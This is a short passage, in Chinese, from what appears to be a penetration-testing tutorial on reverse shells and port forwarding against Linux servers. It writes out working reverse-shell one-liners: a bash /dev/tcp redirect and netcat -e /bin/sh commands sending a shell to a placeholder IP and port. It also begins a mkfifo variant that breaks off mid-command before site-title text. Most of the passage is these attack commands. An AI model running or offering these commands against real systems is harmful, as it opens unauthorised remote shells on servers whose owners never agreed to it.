0×00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结. 0×01 反弹shell 1) Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口bash -i >& /dev/tcp/x.x.x.x/2333 0>&12) NetCatNetcat反弹shell也是常用兵器,经典命令参数-enc -e /bin/sh x.x.x.x 2333但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gWeb渗透中的反弹Shell与端口转发的奇淫技巧_记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华黑客技术